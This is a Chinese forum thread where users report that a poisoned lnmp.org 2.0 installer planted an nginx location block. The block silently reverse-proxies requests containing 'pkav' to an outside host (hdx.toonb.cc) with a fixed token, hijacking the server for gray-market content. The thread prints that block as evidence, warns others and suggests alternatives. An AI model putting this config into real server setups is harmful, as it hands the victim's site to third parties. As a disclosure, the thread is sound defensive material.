lnmp.org2.0阿里云灰产被跳转代x理

ls2829373

location ~* /.*pkav.* {
    proxy_set_header X-Static-Token "ailunnb666";
    proxy_pass http://hdx.toonb.cc;
    proxy_set_header X-Forwarded-Host $host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_set_header REMOTE-HOST $host;
    proxy_http_version 1.1;

    add_header X-Cache $upstream_cache_status;

    set $static_fileMJrCAYTq 0;
    if ($uri ~* "\.(gif|png|jpg|css|js|woff|woff2)$") {
        set $static_fileMJrCAYTq 1;
        expires 1m;
    }
    if ($static_fileMJrCAYTq = 0) {
        add_header Cache-Control no-cache;
    }
    }
        include enable-php-pathinfo.conf;

        location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$
        {
            expires      30d;
        }

        location ~ .*\.(js|css)?$
        {
            expires      12h;
        }

        location ~ /.well-known {
            allow all;
        }

        location ~ /\.
        {
            deny all;
        }

        location / {
            return 301 https://$host$request_uri;
        }

        access_log off;
    }各位有相关服务的可以排查下。真是离谱啊

hacn

官网版本？和官方有通讯的就别用了

ls2829373

这里找到了一个文件。是多出在安装目录，并执行的，真是**。

随波逐流

这不是早被放毒了吗，咋还在用，宝塔都比他放心

ls2829373

随波逐流 发表于 2024-7-22 12:50
这不是早被放毒了吗，咋还在用，宝塔都比他放心

去年装的，就是懒，然后这个症状还不一样。

jekyll

我天翼云盘里有一个lnmp完整包备份文件夹，不知道哪个坏透了了的傻X分享的备份，我转存了，后来发现2.0就是被投毒的版本，那还备份个毛。

NVMe

LNMP 投毒之後我一直再用這個

https://github.com/moeYuiYui/lnmp

Apian

不敢用了。。。。

莆田郑少斌

jekyll 发表于 2024-7-22 12:59
我天翼云盘里有一个lnmp完整包备份文件夹，不知道哪个坏透了了的傻X分享的备份，我转存了，后来发现2.0就是 ...

干灰产的说1.8及之前的应该没投毒，等大佬测试

jekyll

莆田郑少斌 发表于 2024-7-22 13:35
干灰产的说1.8及之前的应该没投毒，等大佬测试

没用，完全离线编译很难实现，你只要联网，就难免出问题，没时间去审计那么多脚本，除非军哥亲自说明过程中不会从vpser.net或者lnmp.org拉取数据。